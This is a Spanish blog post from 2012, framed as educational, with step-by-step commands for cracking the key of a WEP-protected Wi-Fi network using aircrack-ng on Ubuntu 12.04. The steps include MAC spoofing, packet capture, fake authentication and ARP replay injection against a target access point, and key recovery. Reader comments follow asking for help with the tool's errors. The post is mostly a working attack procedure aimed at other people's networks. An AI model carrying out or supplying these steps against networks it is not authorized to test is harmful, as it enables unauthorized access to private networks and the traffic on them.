Buscar en ELMED

sábado, 12 de mayo de 2012

Romper la clave a una Wifi con seguridad WEP (Aircrak+Ubuntu 12.04)

Que tal, En este post  vamos a romper la seguridad de una red WEP con fines educativos.
Primero que todo definamos WEP.
Según wikipedia: WEP es el sistema de cifrado incluido en el estándar IEEE 802.11como protocolo para redes Wireless que permite cifrar la información que se transmite.
Este protocolo utiliza un sistema  de cifrado  inseguro, ya que se puede romper fácilmente con software como Aircrak, a si que revisa tu módem en casa y si usas este tipo de cifrado cámbialo inmediatamente a WPA que es la mejora del WEP.
Para este tutorial usamos un ordenador  ASPIRE4741,con Ubuntu 12.04+Aircrak1.1
Lo primero es instalar Aircrak y Macchanger. Lo pudes hacer asi.


Paso 1:
Para versiones inferiores a unbuntu 12.04

apt-get install aircrack-ng

Para instalar Aircrack en unbuntu 12.04 lo descargas de esta direccion porque al parecer no esta en lo repositorios.Para i386
Luego en la terminal te diriges a la carpeta donde lo descargaste con el comando "cd"

cd /home/luis/Descargas/
sudo dpkg -i aircrack-ng_1.1-1.1build1_amd64.deb


Paso 2:
Luego obtenemos el nombre de nuestra tarjeta de red para el equipo.

sudo ifconfig

Aperecera algo como esto
lo cual me dice que tengo dos tarjetas de red, la eth0 y la wlan0, como su nombre lo dice la que vamos a utilizar es la wlan0 en mi caso.


Paso 3:
Ponemos en modo monitor nuestra tarjeta.

sudo airmon-ng start wlan0
Aparecera algo como la imagen anterior, observe detalladamente la linea seleccionada y se dará cuenta que el nombre de nuestra tarjeta cambia por mon0.
luego en la terminal tecleas.
Paso 4:

sudo ifconfig mon0 down
Esto desactiva la tarjeta. Ahora en la misma terminal.
Paso 5:

sudo macchanger -m 00:11:22:33:44:55 mon0
Cambia la dirección mac de tu tarjeta por 00:11:22:33:44:55 
Paso 6:

sudo ifconfig mon0 up
Vuelve a activar la tarjeta. En la terminal estos tres últimos comando debieron quedar asi.
Paso 7:

sudo airodump-ng mon0

El comando anterior es para capturar paquetes wireless 802.11. 
esperas hasta que aparezca la red deseada que sea "WEP". cuando aperecaz presionas Ctrl+c.


Paso 8:
Abre una nueva terminal, adaptas el comando a tu caso.

sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0
Donde el [CH]: es el numero que aparece en la columna CH para la red elejida de la terminal donde ejecutaste el airodump-ng. Anoto  que el CH debe ser mayor a cero.
[ESSID]:Nombre de la red tambien esta en la terminal donde digitaste el comando airodump-ng.
[BSSID]:La direccion Mac del equipo al que se ataca no esta de mas anotar que      
tambien esta en la terminal donde digitaste el comando airodump-ng.
Bueno nuestro comando debe quedar mas o menos asi

sudo airodump-ng -c 1 -w XXXXX --bssid 8X:CX:AX:CX:8X:0X mon0

En mi caso al ejecuar el comando en la parte superior derecha me daba este mensaje de error  fixed channel mon0: -1. 


Tranquilos que esto se soluciona con un parche al kernel. SI NO TIENES ESTE ERROR NO HAGAS ESTE PASO
Paso 9:
Lo primero es descargar este archivo que contiene los drivers de las tarjetas de red inalambricas para linux.
Lo descomprimes de forma gráfica o por la terminal como sea de tu preferencia. Si es por la terminal lo puedes hacer asi "Terminal Nueva".

tar -jxf compat-wireless-3.4-rc1-2.tar.bz2 

Te ubicas dentro de la carpeta con la terminal.

cd compat-wireless-3.4-rc1-2/

Descargas el parche de Aircrack
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
Instalo el parche
 sudo apt-get install patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
sudo apt-get install build-essential
Luego compilas e instalas.
 make
 sudo make install
 sudo make unload
 sudo reboot 
Ahora si tenemos nuestro sistemas a punto para usar correctamente Aircrak.
Espera que se reinicie la maquina y repite los pasos del 1 al 8.
Paso 10:En una nueva terminal pones.

sudo aireplay-ng -1 6000 -a 8X:CX:AX:CX:8X:0X -h 00:11:22:33:44:55 mon0

Donde 8X:CX:AX:CX:8X:0X es la Mac del equipo atacado.
Paso 11:En una nueva terminal pones.

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 8X:CX:AX:CX:8X:0X -h 00:11:22:33:44:55 mon0

Paso 12:Esperas que los datas en la terminal del paso 8 lleguen almenos a 5000 y ejecutas este comando en una terminal nueva.

sudo aircrack-ng -z XXXXX*.cap 
Listo tenemos la clave de la red.

19 comentarios:

  1. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. Buenas,

    hago todo pasito a pasito pero al llegar al paso 10 el terminal me devuelve:

    Please specify an attack mode.
    "aireplay-ng --help" for help.

    y más adelante después del paso 11 me lista los diferentes ataques...

    Que tipo de ataque hay que utilizar?

    Gracias de antemano

    ResponderEliminar
  3. Las dos lineas en el paso 10 es un solo comando repite los pasos nuevamente y me comentas.

    ResponderEliminar
  4. Hola, también me da problemas el paso 10, me dice esto:

    Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
    mon0 is on channel -1, but the AP uses channel 10

    ResponderEliminar
    Respuestas
    1. Incluso después de instalar el parche, sólo que ahora en lugar de channel -1 dice channel 8, pero sigo sin poder pasar de ahí.

      Eliminar
  5. hola Elmed, desde ya muchas gracias por compartir este tuto, he tenido algunos incovenientes cuando realizo los pasos y no me ha funcionado. me paso esto, en el terminal del paso 8, el contador de la columna #DATA queda en cero, el que va sumando en el de la columna Beacons, tienen que ser asi?
    y despues en el paso 10 me devuelve esto:
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    y en el paso 12 me devuelve esto:
    Opening XXXXX*.cap
    open failed: No such file or directory
    Read 0 packets.

    No networks found, exiting.


    Quitting aircrack-ng...
    Que estoy haciendo mal? una ayudita por favor!
    tengo ubuntu 12.04

    ResponderEliminar
    Respuestas
    1. Tengo el mismo problema en el paso 12, pudiste resolverlo?? como??

      Eliminar
  6. ayuda plis me sale este mensaje de error fixed channel mon0: -1. sigo los pasos que pusiste pero me sale esto
    tar (child): compat-wireless-3.4-rc1-2.tar.bz2: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error is not recoverable: exiting now
    que debo aser??

    ResponderEliminar
    Respuestas
    1. disculpen tengo este mismo problema como lo solucionaste??
      gracias

      Eliminar
  7. Hola, no se puede descargar el parche "wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch" tendras otro sitio en donde lo pueda bajar? gracias.

    ResponderEliminar
    Respuestas
    1. Buscalo con calma aca. http://patches.aircrack-ng.org/

      Eliminar
  8. en la siguiente instruccion tengo una duda no se podrias resolvermela sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 8X:CX:AX:CX:8X:0X -h 00:11:22:33:44:55 mon0 donde esta la serie de las FF:FF:FF:FF:FF:FF a que se refiere o solo hay que ponerlas ??? por que me salio una pantalla al insertar esta instuccion con que si queria usar los paquetes

    ResponderEliminar
  9. Tengo este problema en el paso 12, alguna idea de como resolverlo por fa??

    neton@neton-VPCEA35FL:~$ sudo aircrack-ng -z XXXXX*.cap
    [sudo] password for neton:
    Opening XXXXX*.cap
    open failed: No such file or directory
    Read 0 packets.

    No networks found, exiting.

    Quitting aircrack-ng...

    ResponderEliminar
  10. YO TENGO EL MISMO PROBLEMA QUE ERNESTO, al momento de poner sudo aircrack-ng -z XXXXX*.cap (donde dice "XXXXX*" se pone el nombre de la red cierto?) me aparece que no lee ningun paquete :/ open failed: No such file or directory
    Read 0 packets.

    No networks found, exiting.


    Quitting aircrack-ng...
    enzo@enzo-System-Product-Name:~$

    alguien que me ayude por favor?

    ResponderEliminar
  11. en "XXXXX.cap" pones el nombre del archivo .cap que se te crea, creeeeo que en la carpeta de home.
    Es el nombre de la red-unnumero

    ResponderEliminar
  12. Ocupaba hacer esto para una clase de seguridad y por mas que buscaba como resolver el error de fixed channel -n (tengo ubuntu 12.04) no podía.. Hasta que me tope con este articulo!
    Muchas gracias:D

    ResponderEliminar
  13. disculpa una duda en el paso 7 me aparece lo siguiente y no entiendo que quiere decir:
    ioctl(SIOCSIWMODE) failed: Invalid argument

    ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
    Sysfs injection support was not found either.

    ResponderEliminar